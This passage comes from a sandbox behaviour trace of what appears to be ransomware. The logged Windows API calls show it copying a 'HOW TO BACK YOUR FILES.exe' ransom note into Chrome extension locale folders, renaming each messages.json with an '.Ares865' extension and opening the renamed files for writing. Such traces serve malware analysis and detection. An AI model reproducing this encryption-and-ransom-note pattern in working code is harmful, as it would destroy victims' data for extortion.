Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.243] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.244] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=219) returned 1 [0102.246] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru" [0102.247] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru" [0102.247] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.247] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.247] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.248] GetLastError () returned 0x0 [0102.248] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.248] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x841dcb10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e99e1a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e99e1a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.248] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.248] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.248] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.248] lstrlenW (lpString="messages.json") returned 13 [0102.248] lstrlenW (lpString="Ares865") returned 7 [0102.248] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.248] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.Ares865") returned 160 [0102.248] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.250] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.250] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=254) returned 1 [0102.253] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro" [0102.253] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro" [0102.253] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.253] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.254] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.254] GetLastError () returned 0x0 [0102.254] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.254] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x841d55e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e99e1a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e99e1a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.254] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.254] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.255] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.255] lstrlenW (lpString="messages.json") returned 13 [0102.255] lstrlenW (lpString="Ares865") returned 7 [0102.255] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.255] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.Ares865") returned 160 [0102.255] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.256] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.257] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=226) returned 1 [0102.260] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT" [0102.260] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT" [0102.260] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.260] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.260] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.261] GetLastError () returned 0x0 [0102.261] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.261] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x841ce0b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e99e1a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e99e1a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.261] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.261] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.261] lstrcpyW (in: lpString1=0x2cce51c, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.261] lstrlenW (lpString="messages.json") returned 13 [0102.261] lstrlenW (lpString="Ares865") returned 7 [0102.261] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.262] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json.Ares865") returned 163 [0102.262] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.263] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.263] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=230) returned 1 [0102.266] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR" [0102.266] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR" [0102.266] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.266] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.267] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.267] GetLastError () returned 0x0 [0102.267] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.267] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x841c6b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e9c4300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e9c4300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.268] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.268] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.268] lstrcpyW (in: lpString1=0x2cce51c, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.268] lstrlenW (lpString="messages.json") returned 13 [0102.268] lstrlenW (lpString="Ares865") returned 7 [0102.268] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.268] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json.Ares865") returned 163 [0102.268] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.269] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.270] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=213) returned 1 [0102.273] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl" [0102.273] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl" [0102.273] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.273] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.274] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.274] GetLastError () returned 0x0 [0102.274] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.274] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x841bcf40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e9c4300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e9c4300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.274] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.274] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.274] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.274] lstrlenW (lpString="messages.json") returned 13 [0102.275] lstrlenW (lpString="Ares865") returned 7 [0102.275] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.275] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.Ares865") returned 160 [0102.275] MoveFileExW 